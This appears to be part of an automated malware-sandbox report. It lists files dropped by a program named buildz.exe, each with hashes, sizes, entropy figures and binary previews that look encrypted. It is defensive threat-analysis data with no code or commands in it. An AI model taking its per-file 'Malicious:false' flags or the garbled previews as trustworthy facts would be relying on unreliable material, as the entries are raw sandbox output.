                        SSDEEP:96:8pTRTNlM8XReH4eGSXKx2Dfvf8idqYajTAHo58isx10msAMGl4ttsFd7u7VA:8FRrM8XRySMKxmE+WjTAH5Jlspk4sFdf
                        MD5:BF417262100A5092B29650D54815A452
                        SHA1:C2F3BE949DF8CEF01ED9D8CAF5815400F81F9AEF
                        SHA-256:8D4F7E191F5333B8C275B17D8D292F8CD1E88D0A79F634AA566809E743AF16BA
                        SHA-512:13F4E6F13BF0A05B7AE824981F1B9D94905B69B131E110228800421B9790F7C42D9C661E144C9EC5F1C544E90C98913A453977AC6EC3AB2E24741E5A0C3AECE3
                        Malicious:false
                        Preview:<?xml.|....'..)....j....6v.U......K4V_7J...9.....K1...1....Rt.....JX.0Xv.....xb.^...1.d3...b..S@I\...x+..;~..5.b..&A...bey.x.&12.J...v.~a=..0[..-.......<m... .(4_ho......3...Q.0.G.`.`.`.......1V....=........w4.C....u...qm).#.q...(j.5.Gi..g..8...t<....{.!/..3. {...d.%L ...o...i|&lc.p.......u...|Z....x....?.....T...8.T.i.......e\...J............K.x...H+........?.Rh.....k.q6r.<....|..fj._?^.I.:.h.._$..H...pB..p..b.y^3.[T.ni1..+...C....L.^Y%f..u..+...mt..6......@.....0Q./R...$.zz.s.R[:.t.N.#}5H..."..$.,.{./...z%..._...dz.f..T..+.....*.D.E.$ #..K...#...p.C.~U...>.\...f./.#..6.q.......x..x.......Vx.xhj.&.`h.2.W..W.7.GB]..4W.[....~#...B..Zp}I..Qg...f..J......._....5.?..\.$C.IAi.?..@.x....`>....nSD...F2...{.|....7..qY.>.i.)1a.5..7.E2.vk.G.X5.gs.'....c...........n.......6+......b...r......y....4...h ~...3\.. /..Nt..7.O.p~."..E.Oa.+B.HP..Cu\.{{..fC#..KVq....l.c.)P%......&...tCC...2...V?g.".K"...D.|..*.c...._...<...m.x_\.rbO.2v.T.,.w...!7..L...q.U2|%.;
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1329
                        Entropy (8bit):7.850473656115601
                        Encrypted:false
                        SSDEEP:24:bRILziZnvZiD+pt5uDE/KScYzImx/Y1AvFWP2wtydOP1Wti31Ec+Th/3EpFHGbD:1Czi5vZiC7CDYzIC/9hdOP1j312l3Ep2
                        MD5:B24B9F93EC62F98798390537220DECF7
                        SHA1:519CA064FF53AE08B2777443A090F24AE7A6DB62
                        SHA-256:1A06AE928CAC928EDCF4757962AA0EAF1C7F0AFD50CE4464FAEE1CF9730F9D63
                        SHA-512:3BE6D0185AA4ABD45AB8715814F856CC20D4512D2B9E219344476C027E130095DF8E963D0B06A00D4B2017DD35B61D08CE516ABC3D2AE19F1DE54163B27915AD
                        Malicious:false
                        Preview:<?xmlA!....W.o.i4.3.4...P.u........k.f.9a...b....V9.Z........5U^..et..B[.....@..t...=g{....r.O....#..0.d.6NWcIz...-".,....s.....J$.a!.e...W....H.d.9.G..fAXD..C..d..R.0..{!.n..I.[...~'....\^)..f.d..:..;E.x(. h..F_....'./~....B...s..c..C....4..*.....E..e...fp|......D...s...D.........5.I_z.U_.i.;.ghRO...%....W.v..%....3../.7#.8.d.......o*xj.d`Ub.J.{.4d.h..r..........{L{.j.H+. ....[78...C..7............. .\n$V..Sc...,..V+;.aX...z.]...N.Wb+.r....9.........K.x...4....^......%,&.K.t......qFy......3..m]..,[...._...J8O..l'.....ER.'...np..h.g.Q.(..e..\...X.|0.u.]........_..'..2....5..>.<x..n*.A_.M..a..N.B...;O#...1...m....6...i...;\.....$.X~..]. .r..D.m.}.~f.o..p....T.....s...VF\.zg.'..H.yM.k..Y7s.....X|q..y!.&.....5.........C.U9wM..k...L..z.>hy.;Qv...s..wK..&p.o..F...a...V.=KI......E......|D.x....4..g..H........4..6g...Z.=yq.<.W.......L.q.A....\...G..c......}...R..%!..w.......H8.p%CN.-6..."...s......R.(t....Y.a......q.S....S.>..d.e....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1395
                        Entropy (8bit):7.862626877128475
                        Encrypted:false
                        SSDEEP:24:fpMcaQTTdABA7QnmlytLjRe7Z5HkelY3pqZFRuhXoK5vjhoh7KiVnBGbD:fpMcbTTdABfnml4QZueasZFR+XtguMUD
                        MD5:9E78C96B5A0DD532F77EED08F519243A
                        SHA1:5F931B0ACF59ACB6AE34605D45B223610797A43C
                        SHA-256:87056178AD1FB44B9BC1FBA189B26D13C3BD056C7E6A3943FD6BE479BF9FBB7E
                        SHA-512:C60F76A7E7A1F66AF792A9033E99752EA6093ADCEE2D9002E1970FD14E0F244E4437A80CCEA1D39F47652988BC3CDDF5A1EEE600485116FEBA2635611564FDB6
                        Malicious:false
                        Preview:<?xmlV.....=l......+.G....b....................5.c.Z.......p.7..."{?.....|.Ca..^+.!...F{......E.....oe..s0.s>...h..B..2..k[.,.,...I.....t.........))....V......b..H.z/....j.....O..|.?..BU%..H?...}8....u.=;.I....'.........>........N.&v.>..Z..&pJ./.h.gJM.$).mpR.|.~.<........O.....[*U.=...5y.uCQ.....^.K@....Y...4.]\!....H.{."W.Cl@}&...~.".qA..6b_...'.!...^....L...!.;..2.3.7..u^..B|7....I.B.2..#.....@.Z <C.#...L..T.O..:....|..D..z.E.C..x.><q....t...F....i.........#@..K.|...........%..4...3K........]L...C.]..I..hH.$.L..I......dX<......Q..}.......49..g:)t...n........{..?..J..!....&5.#....}z.:qp....yfb.._P.T.+.......H.wfk].Str.P...c.h&.B.D...z?.R"$.]...T.#~gd.G..(r.n.%..Gu..JE...5Ep'..e3..T.kl..ys...P..2.'[.........QV.U.`....L.>..N(gG...5....6...Me.....u.2..,T.eU.e.t.pIA..C.H..x.m....[(..2.1...e...{..j:./...r....$...YtD.Fd...~;.~.U..Q......d.|.C..z[H.'...|.5...{k.G1..N.p.....Z.-f.......^...f...\..At....A6kW...9~.M%...Q.N}+j.....F[......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1124
                        Entropy (8bit):7.78801599578306
                        Encrypted:false
                        SSDEEP:24:s6m6R4xyPOinUjwv1FodeIdN/mR73nMlywjusKmhhiGbD:s6m6R4xhi6N3mRbnMkw6sPIUD
                        MD5:FD7C9D85E4F0C01059831DF13B2D6F4A
                        SHA1:B7EAFA3038C66C29E2A2CCFE0D14C3A328C53FBC
                        SHA-256:8423B9546DCA396A1BDB6DDFDA0661BFC0DBEDCEB98A20C2E57364F6F6630545
                        SHA-512:352F5AF94192C49AC80C154F4A132F2CE6DC2F49BDF7921A32695E48979C0C43812B7C7F4B83E9FE35F6A62539C227EECFF06C53037149874D20EEAA1D0D3D35
                        Malicious:false
                        Preview:<?xml...b.W>..n..:D].#.w...~.l%.....X........e..e..HG.H|.rl.]qI'.....].D|..XF.]XF....J"G..6.. ..A..kbA`...;C.:<.a.$.............2:.p7.....(..]c.u..]..W..l'..x4]J...\t....#...y../f..q..'4 .ah....v..4.w.4...=..zA....4..v....Bu.|..Jmcg3iH.......j;....z=x.........d..z.p..,^...VL.B..M.I/...m.~P[J+<ZYbZ.f..(...v..y...n.f.^.........4-....&.%..@...r.J.D.V..f....B<.....]>....h...V.P.S.|.}..'.....^.H...n%..4+...I..MJ.IH.X.UQ....Y..^.%..4....xg...-... ...%#.x,..B...%.....P..d...a...7K%..A...O.!.z..1%$.o.g._....+0 l.EW..kH?.;..(.X.z.S.....q.%....b^Xx..7M.."r[pix....0..C..1.>...Y..p.4......v.......Gh...rq...%.!KT.q"e.1G...$.+%|5.'..L!|..a.... ......Z.%.i..<I.....:an...k.&Bgt..-_.wS...l....P.'.[F....ll.M&u.{....Tp..LK.....p..........lY..n.e.....?1...K.6......b..il.KP.Rg..y.a...R//..\...'O\..........+..*.I.z.....{S../.no1/.R.$.^...\..[.5..F...u..l..GWw..b...P..Vi$..2.R#...a.J5...........r....4H.\&......+.+....'........5dC...C.....'.2p..6..wz
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8769
                        Entropy (8bit):7.983552415569031
                        Encrypted:false
                        SSDEEP:192:31RJSOPYXZyYn4Jp/11J9eN4Qn+FmO7ejoZlDP0h5rg9fduZOA:DBAXZyBL1Hxg+nXrzC5rOfYOA
                        MD5:6EFCE5187750F192B4C9076631092D4A
                        SHA1:594F1A627A38798203EC4C4C5A262D613C812C01
                        SHA-256:6A56C3C3C773D7FC842F3595C36B92BABA5CD30EE530EBF1C994B8AA68A7690A
                        SHA-512:9F9EEF81F12E76DCE3E2BE8162B14505582BE3191783245FCA1967B964728C988D17EC3F07517CE9E5469530B2CDE1E198FA06A6CC33873C8C29EAE522841F80
                        Malicious:false
                        Preview:<?xmlzD.+...&..m?..../.....f.c..^..8.w..-..f...........!d.=..Dkf..0i.{.Y.d.... )....`...~...}.[...^..A....QIM.....D\..U..]bv..4+b=.F........zb5.......wr.JKt.[x..<k...i..v......v.L1..f../..{.O.!....O......Q.&..y....v....(@....u.|..;....(....K.[3....(...<z)...U....u.'.o.....rZ..| .J.R..p..V..O4.5Q..%[.r.N...^./.....+...]!..p.I.g.....\R.`3K..Z?}_H.e..... P?.xD2x..%.G..0u...S.0.4..Y..2l..e.<..Z..A.sNJDX...-;b...Z..:.~.`h.{J.d..m...r...r9w.2....`.5...X#ELE...Q.....e..'"....g.H..A@.)a.P..UDe..g....R(....N....Hf.2...3...^.Y....=...S......T...B.._pR20..k..+....D:..-........B..J.%.)%.3.,.5...D.......B.. ...|Z.^...!.hR.4..U14.=.f'....&.+-...Y..q....".'.jD.....F^Y]...7...>K$ve.J^..._BM... ......W.<6....cT.... 0..G`.J.I.H..g..(c..Or.W...._b...M..2./..7..Lz.p.?.3.W.h...0S:@X%.w39.6.P...O....V/...#...i>.`h.....e.]A..[....m(..u^N$T.^..R... +AOb6.~M.z.....$|..u.";..J..G@.>..G=...,@.S.d?x$.Lo......:...K..._s..Q...w..\......2w0:.....D..0...5-}..;.}..4-..^Y.U...N3
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5842
                        Entropy (8bit):7.968890470938188
                        Encrypted:false
                        SSDEEP:96:2V5Xe9R7NAITpNrNsXLeT8AAnYPbmJJcZgpn0lvR/bQIDNK/ll/IlKFv2nFA:kcpHp9NX4AAyKJuZzQljkKV2nFA
                        MD5:F55200182BBF351A2AA8D128C8D42139
                        SHA1:814A5059C6AF29AB60AF3A109D2E8053DC5259B1
                        SHA-256:087C816E522FB787BE668B9F1BACD9E36D34739753613508D8658872BD60BF15
                        SHA-512:0EA46FA7115A90BEAA0B4858E40AFF7AE1716543262296B4CC518A59BA745AF3B995963429301DEB5836E8C5D311F560E8AAF3885A7487E822CD3421CB89C632
                        Malicious:false
                        Preview:<?xmlg...0..i..p.f......9.1or...i....[..!..b..r.@....lpU..@..?....dgR..~...].?%)..........3......&...... (A.....#......!%..uz....9.<7s...Q...pj.XD.....>..>:..P..M..o......c...&..]..?{....y.......a..'Q.y-S..f.n.6......9.HQ......A).V.d..1.....d.A..I.9.@.w...y.%..Z,......d.Y|...GY....K.|r2d..1*.LBj~f.w...'.K.z.;.I...M...m&T.'...9H.J....S....Q..NB8.e...U.}..h.d'.xd..}.g....~g...`LB.....r].t..^.y..A...........v..r...:..w..e...x.p...j.s.&.pi.>.w%.WL....z.z."F.n..B{.C..k....N..._...;...<.E....A4?.......jc._).[.9..b..R.h>.... _...T.*....u....p..........(.G.,_q.Xa....E..8........l..Ru.&+..=.D+{.@.v..W/2.h....}.e..RL..+2...+..|.&.Z<..5.... ........p..q..si")6...k`.w...........,..8Lw....56i.O.<t=....f<.m.i.27V..NK4..lg.3.y<}.%..V.sf...KE.....c)c.g.H...W0.....V...D.8....'>........>-X.......-NPi'Y.das..j..].......&2.0.....1.R_...5.......#q".`q.H......N.%e!.$.Lpe.d_>A...b&.mI.l@w..e..G.8.?.j..#z....z.ng ....G":.;.q......W.C...............~.`.d....R....A...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4787
                        Entropy (8bit):7.9538909055798115
                        Encrypted:false
                        SSDEEP:96:HUXohBXaKj+JdRP2eDbm7TTky7Jsdr24cL719ut9S6yOIFtXYxFIHC7ERUjIsJA:HUXohBXaKjmnOOCPMx24cLpE+6e7IXIV
                        MD5:ABD719F4D793F9FF0FFFF7E64EB908DA
                        SHA1:2800FD7DFB3DF1E9A9FC7BFF315261B028583B2B
                        SHA-256:69B007952CAAB3C7BE78FD30ABED86FF6727E480CA12F7E4B00AFED3C141E134
                        SHA-512:8324712F59B7F951485EC4748428C02B2DEE9847F5F6D698A51BE68DE77DC770818799B387F712C4CA432A988940C66112EBB0E2FCD4AE29B5E5CDE8D896C711
                        Malicious:false
                        Preview:<?xml.=.....AlVY+!.a.H..^esB.F..9D........tT....X6S...\.*8......X&.;...y;.ygj<.........hx.~....<.<....,.~.*....TV.&.:N......dy.........DK....Q.x..... .R$...cp....,.I.E..<.B...N..a..z..>......b.N.:..D. ...n.....N.......6.Y.>X..~|C....n...wn..`.....U_GB2y..~2..\._Ya).]..e.9_.....W.d....O.q.....\.y........S.....}z0..k...H!$XQ.....~........[H...^tElJ....<VS...Wh\.f. *...|?q....X.2Y.9g.I.=..@[.[...3kQ.We.&'9gw.4..f...o2k?/ii;Z..,<7..u..tO@].p>!..e3..D.....a..=.e...)...&..+0.3).W..AN..{.1.#...2....nv...........w....bf.2.s9...S..hf.....=.......$r..T.S.0...!.T.i...c..0~A..#..P.......@.P...X..=X.....JU.5./>-+.c...H{..ts30...........-....{..>.......C...J..1.*e{%.*G3.......X...."..1...ww."..c.S..^A>[L..C..."T. .......0.q.E|C...'..T..Ts..70y.f.a...B.`..qS........^`.X.!...q..$c.....Op..s.....hT.I9.....O..}f%.........,<!Tf,..&......G .1v.p......J.....c.T1$........ 4..b..r{i^....s....r.6zHl.;@a..VG.._H..d.3.s@%^.c.W..-...tZ...5........3.5...i....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4786
                        Entropy (8bit):7.9617170426749295
                        Encrypted:false
                        SSDEEP:96:IGMt0vsz5HRqrcRTRWB0i863p5GSpvTzFc8DERCPiy0QEIqlA:ckCQrGwg637GSVztiC9iA
                        MD5:A3A09CCF383E72350439622C2C7806FB
                        SHA1:005564C783DACFB1163097E1C1342D7EB1FFE2CB
                        SHA-256:7D16BB538B80D0C7FF4A5B90300391B8550C146CC72343BBCAFD1122588649D4
                        SHA-512:CE0DDDF7B848AF7ED61A6B3C1B9C3EE54D80FC35BEFF29173C1C857265CCF197BAD0D3F763EFAA558E5F17E4F779C59FC6B1B9CC7FB0B89E852D82397B4FB730
                        Malicious:false
                        Preview:<?xml.K.{v.....X.j...R.L_'N....=.0.Q..\Y...Ef...L..o6.r.Z..X........[}....=.@w...k.5.$4.d?.%...".g.B.....[..E..=..B....#-...o....sX...>V....Y..2.../2..;.K..l..f.-,.....04..;B...ms.d..2.c.....r...<.).o.V...)9. .k+..O...,.p<.._.f.......(......#.....].....J.\Y.Y.(f......[.....}...at.%.{X..*.)...j.ZQ..#..0u..E.../Bdp.....+g8...Md!)b.....J..a.J...../..2......p....+).R.o.0..W.%xP.M...Ke.....mH0p.,..w..M.*..)/U.gh.U9...3.j...'..~.......(....M.>.O:...R..s.RC...2G..F..+..l.+.. ..4..P4.c..$0.......v.H.P..z.K...`..A.o.Mo..g.2..G.)....k......M.p.w.K.W.e].wFjE.%.}+.5.Cq...l{.8..(%.C..g\/oF......_r.-.*X7..r...k..e.N6..z.ufB..g...Z.44..W...jS.ZP.........=..+`.D....\.R..6..Db..-.`.;.........E.Q..;...>P..W|.h..........|...f...o1y..s....2.i....F......3%'`M]'.D./.".a>....b...Q.L.._.FQ......aAj.N..t.Ggg.+=..n.P,H.5..=.y~.W.7a...7..A.....1...@}..F.Yu...........#G.h...pHt..|.....'....2.Iu..:..{..4.A....*.......=Gg.........y.......K.5..'>...e.l7..<..o./._.j.HB
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3030
                        Entropy (8bit):7.937026640378302
                        Encrypted:false
                        SSDEEP:48:mujvT8sv/BN4MF6/X6oVADU442rO3dGKd3t4pjtdqWmuN1diESKBCIOUD:m+5K/X6uA0YfKL4prqWmQ8nCCnA
                        MD5:964BE33F4F5D6A62A04CE4A005BDA8E8
                        SHA1:7A370E20A96A2219E167C850D4F52EE2CC76FE6C
                        SHA-256:6C3E298D11869A2A96B7FD256E4DEFD9E3A310790381CFFA430678070DC7A149
                        SHA-512:51179778B462D1175FE58AC079C5EC0E0DF26588185ABEBDB963C1DB89DB48BCAA8A71C70762A545D747358F22F7EB8238C6BA5206DBAD9E26B6CEE3CBDADCEE
                        Malicious:false
                        Preview:<?xmlZ...0+'..F.+/~k....... \.3X.RFn....p.C....=.ZY.. >6.U...T\.M.`........}h..5OE/'.....\.U-..$o.xt.~.u..X.}.X..~...N.8B .........cZ...KJ....t......t"..k.K...Y...j3.U..)v...2...ls+~.....r.px-.=.u.X.\.$....Ns../s....1r.0j....j.........\O>.K...)Z.t.u).....v..#..a.:*...u*....iCh5.=8V.`.&.|.A..N......O4.brx.@fa.,....~..i..!~..wC.2y.P.4ci.t.]...f.....U.....R..X..9^/+..>8..6...........H...R....<e.o.T.v.3..T...j.._C\......aM.,.^#.m..).?T.4^.......N..Q .E ..!`...Ry.U.&....xL....#.!..4Kj..l....h.....B.A..!.|....q.l..bD.O?..*..:+H.....Q.l............^...2A|.a.~.w~...4.....G..t6s.hgT+&.S..~.&.2..}...t..../..-..U.l......u.H....\....W.........5;.......vk.rPt.......B"!....S!.<..%..h.jB.l.....)C...]......x...l...(.......R...B..~.':..].*..Ui........P....?.N......rll.U.... .}.."...U.$.V..#.`g?..>u.P.3]...|.t......7t.^.6ca.m...)....e..k.I.]&..u.~4.....W"l.5...h.s......k.Ux.W?,C......G.' ._.X@.1~d..].C'.^.....C5r......eU......l..._..T1.7
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):789
                        Entropy (8bit):7.703179265695437
                        Encrypted:false
                        SSDEEP:24:L9LZq8RLB4DdOEkgS5+fwW8rKYwNya+8UEJ9GbD:L9txd4oDgz4NHw0a+8UEJ9UD
                        MD5:C3C3B1652BF576E686576066884D361A
                        SHA1:D482F7BDDE770052DCB59ED6FE805679D2B755EB
                        SHA-256:47284D20C957CC2410D1E0B98533610B5100A6C8E18BC5ECADBCF98B45FF3DD2
                        SHA-512:90728D8A813383E40EF006F5AAA9776DB6D3788DE15A88193AA464FBBDB785606D8875CEB40F2BC707E773270D54AB586FC1870B8194C12A1EA438D5A3A8BEE1
                        Malicious:false
                        Preview:<?xml.{B....}m..>/..G-..X..og..FA.Qu...T... .gu\.0..y..97hT.vd.a..)..>zO).,.%.....:...-....L(..".9S1...Q....=LI...C.{/u;..)7*....h.......o....@...\...........9.yrT.:..&...s..Z.|...GB.^9l.C.!(..,.a..J.TD:...-/..8..2.hR@.SB...Tg...._..6J.7s. ..p.S......B....s......L..@T.;..q....Rl=..3$..E.$..J..@.z..I".\..<[.../....H...[.wu....v..d.t...0K....([o..M.n[....x...|...3..........2R.j..t.....J.)..F..L...V..".[|Cz...E....Y:.s...g.3.!..L....}..`...8=N.h.5.=:Jq.(.Rb......R).>.X].Y..Dk...:.:l.v.....y.U......Ea&.... I.\..t.>.'.b...L.3....Q./....&.`.t.-...~Bw Xd..]...PSF...g..Yn<.4...|?D.o.Q.....*..C(......4..S.y.5.^CUdMJ.G....i..J....D.....t!.{b.B..C@.`........z.t. K...i...~y...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3017
                        Entropy (8bit):7.941530569780173
                        Encrypted:false
                        SSDEEP:48:C1UkC74yiQqj790kgEoHtMmNJZCbgTeGpA24sbFHdrnHJiOogFIPM2HUD:c39BoHtMmpNZ4sbFHVHloUT+A
                        MD5:D1E08310409E59267B3ADFFD7C049BA9
                        SHA1:E7AD3FC200D6DB0D92D38259458CA3B539D7F86C
                        SHA-256:E769B5DB921645E1B06CDBFB72C7105BBD689B6E8A26FDB78897A1C8545ABC04
                        SHA-512:CF1BC3971DEEAE799367A7BB0B67A56DB6132ED806261B5FD5DFCC6FDD58BB7D7E8FE9F4C17541494042A6B86C78548A14A952748FB29E12D62356A051B15A3A
                        Malicious:false
                        Preview:<?xmlK..}..,>..pd.....E...r.1 ..u;.........la.f...e(.$m..xEz..Xo.....o..0.W{...oj{...Vp.?.....R.~y...p"Ok.........p....1l.X.../.u3...*.o.......(GW.*..d..0..QALZ..$.b..ZO..A..{:.|5.. .V.......F.H?w[+...._./.HT.+..,.Q?$..2.v.u...Hs.....C..>.....f.Ii]o.NvK..5E$!].z..4-R......]...k?...z)....`9.p...^.}......)...o..V..O...?..,Cu.W.w.K.y.U..Uo...=.D.p....Y..+.. ..W..yTZ.#J^'B.....g#..!.....I..#..<:....]......t...t'.6..*.;.k*t.Cx&G&f..V;.iu|e.'.I.....>w*.c.A.u..['=.y.1.lU..%.....e{o"#..UR../.U.{....).."...:..V.2.H-....3Cx.Y%%XX.-.....l...s.|.N....4...1..4.R(.w./.Y,..S.xe1....[P.8..|j......Y...v0...t....#.gZ.3h......R.}.K.....^+ur..}[...Hf....).}FN.E....-.A.c..qO...~.1..(......WW....85ZA RGC*...0yx..4..|..K.nm4..?...b.e!R..\.(r8{.Q.l.V.U(.1...q....G.......PTR......c..{.x..bs..w.j....-....|^.z.Y..o..&9.f%.m..F{WE..`^...q..XS..5k......;Z....k.J..vh:k....bsY.7.'....3 .{k.y...A..pR.G..(j.+.T.(.>.....8..sd.T]e.....r.....T.+..o..Z2o1%jVc."...../....<$
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):823
                        Entropy (8bit):7.729116914771451
                        Encrypted:false
                        SSDEEP:24:sc5bYc9g2vJ2AglmVS8eJ0DYg59/bAm0JedOChGbD:s2cc6CSmQ8eaE2Z7zhUD
                        MD5:1C2600EE199AC7551C984CCB38321E5C
                        SHA1:68F81B95FFCC57E655FA23DB0A6A02242D7BE7EB
                        SHA-256:06F929FE5449DF6A14E0A15279E8156DCFF0ACFDF939EA71D3D6449860E01D44
                        SHA-512:369F58A318CE90874C49AA0E044C2D03F6895B490714651DABC6421F7A407985C38E616E26349FDE2611E841735D91A473D9FF14C04C757AE3804596A07B0379
                        Malicious:false
                        Preview:<?xml..|r.}..?.r.V_.>.8.~.7nN..\01.. '.a.F.e..>1D~."9.6%8#....w.........>.-...........=f1.j.{......J...:...._bDUTs...6.ca.y..7.....w.Tl.0....r..*.>..8.,.....-3.......e{\.-.G....4.J.k..N.@.:..!C..K...P.k.O.:.7y.}.y..._..d1M.g.w*.....K..2...j-w*[.B.$<u..E.H,....../Z..x..}....\.L..F.x....)T...5..;...-.r.....n.......|<V.8...F..G...~..v\>...>......D.8T._..\{.p.v..&...1/!.*0..=L.&..j[....iH.#S...v..]-y....eE<....0.Q:...d)q ..Q*..X1`..S.........W..S.n.G.ek2.&.v.FH.a.#.?[`..E.$5.....)"x.L.../.`.W..zt....*.|.T".e.....l..'.<F.....0j..~o.....4..p..]jq.t....F.J.w..E..A.l.C..*0.`.>......w.....?...$..X}..c.5=i.g.....j.s..D...;)..Z.D4-.k.]b....O.E..|..2)Bf....|2'....w..o..+.A]..FUsOh..5.$.a.dB.)i x:.jZu.<...E..^.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3017
                        Entropy (8bit):7.935363926796117
                        Encrypted:false
                        SSDEEP:48:Szc49VGXP1OJP46x/A8H+xm1lyOOtr2/T86YMowSdi2zL5WPhqw1WFnLlESdUD:SzfVGX9K/A8H+ROCi/TJx0lAT1qLlE+A
                        MD5:9A42C85EBC984D06895C98BD0E2F90B9
                        SHA1:3C8BC113D6412381E2E2620634615682AE102874
                        SHA-256:5ABCA9300347B9B3628D4E7F0B1141D9EE4325020BA8CFBDB97ADE4C5DF4C55A
                        SHA-512:E19C3B098D28B5CA337F9AFCBE00BEF82DEDA0B2F5DF5042A36DF94A2DD1BED4FF92A21DAF1E7AECAB1273C5F90FE9A8CAB4171798FABF06080224D466499069
                        Malicious:false
                        Preview:<?xml.@R .........'.r{....N ..d.&'?.y......;.'...l.o.t....7.a.7..Z..-.&......:iru..;.....'0..fI..E^..y^.U.(....?...*..-ZZ..y.....wi.....K.?.x..u..h.A....{...<s.s......A.u..L.1(o.ZI..aM......U5&l..p...e.#.^ ....@4....QyP.,$...0....Z. ...J.[....B...!R...R.w.V....f..Sp....c.....4...K....p.f~;.@=......j..a....B.ewN#>.x.T].,R...k(.[."*.~.B..)..!.....1...6.a..Znuc@.=.5"...r,'..8..c....&.@.e<..u%.<..B...B.d..>..F4..-l.."Q.k[.9......'..1i...`*R.}..b...!...T.....U.7.A....N..HB.R........-Q.c...s.<3.L...H....."Y]..nM;.+.....K.@.|.2yJ...`.|.6a.Q.).&...R......~.Xe..K).%...k10......p.... J..4B3=P.}...K.u....W.9&....."2.B.%...*.UeQ.;.P..J........$.[@.P...0.c..9...=.j-....089.',Sr.Mi.$7v.!.A.r......1.y...e..."+Z..;...E>yG..s..o.....&.z{...E*SGi.T.M.....fID..1....s.....A...Yj!Y....:......g...*..>..qk.p..0,c...?.2....G.C.CS.w~...X....hW88.8.....n..h...:1..18.[.%.....]h...%T[...A1.-..,&u..T..4<U...../W...!N*..b.~/b"p...5.!.u..D....N}L!....5".`
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1021
                        Entropy (8bit):7.781015543392442
                        Encrypted:false
                        SSDEEP:24:+ATKIVmUCPzkJfAfUS4alfLzYF3Xr26AFWUlGbD:rTlV32zkJMUWlfLzeXS6AF9UD
                        MD5:A2BEA8ED795AF5778BC4B6737590E9E1
                        SHA1:68C3D113A4AE33CBF92011C91A09B85E82B09FB9
                        SHA-256:5D199A0DAF01B942E1205A80353248AE5E2F8FF06E5426C83C871664E50CBF99
                        SHA-512:22BF6B883870174258EAF37048DE70C9F9CB3B1FE8D8113F59EACEA8B40C1DB59C58D01F99E39B5B26813D84EA78838D1D74106697C563D80DBF084121C5B0FE
                        Malicious:false
                        Preview:<?xmlcv?.0:.....*.8.c"#.E$.Z...2C....%..d...,.|d.@)*..S.(....YbPS..Sd.#;...|..Za.f....p...].(K..l.ta.1L...{-.............gM...8...{S...a.36.:..p...8.....(.i..I$.!F...2....r.!+..6.5f.F?.DD...K..Y.td\HQ..w.n.BL..u.C.+.#......vT@...+-b...|.J.......I...|hm..>..d...?#...`.R..;D.D.E...$Z.N..d.........3.y..$t}..Q.XY^.v.i..i;........!...p.@p6.@.........J.^{u....8$.Z.M...ja^..&..L.......L@n..........Z.t,..!..._[s+.*..z?..0k0.....6-.Nn._...6.T.........n>.+.3..:..w.d..._..+..1....U......=$+..._[....3Z........]e. .(.._..>.f#.m..8..Y....e..}..6V..g.4..|.*.,a.S..>....A..(......p..4s..Ts..H.0........Z..1 .s..B......T....a.2.."J7........z.q......]&..!.Pq!..U.g.......] ...d.o.+. ..`...8.....#..........Ib1...Sq.rZ....>.{h...L....3..EI.]..n:.d,O..Q....|......^!Wx..{N.....Yn..Q.0.IW....".g.7.Q. .*0P7...r 2.o..S..8.|:M..z8.%."....g.....;8.....?E..l.Q.r.<<.....;............=..Q..:(..,.........5..~.F..6....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1398
                        Entropy (8bit):7.848874152527468
                        Encrypted:false
                        SSDEEP:24:2FCyB0sxoMEagXKWtM2F4MlOEPIhHDVE3NKWHH/1Z+zNwfYmeVTGnaJfC/wAuIf5:2FCyusxPrKhTlbPI1S3NDHH/1Y6VAanl
                        MD5:A523A80BCDBCAFD7FE15B73CC3F05D1C
                        SHA1:437F109F4EA1735F3A5C8F02A64D00D5B4D54885
                        SHA-256:84AC4105D7DE259BCC21498FC1E3E9A49DDB8FFEE8A6EFE7C1E215969A6D6A89
                        SHA-512:AEA122BF91A38D794587038D731C41423FBEFA6E96680000D32D3FF0DAA36673F12EF093CD07980D67BFC4A609C03E661F62421FFEA7E9621585774D94412FF9
                        Malicious:false
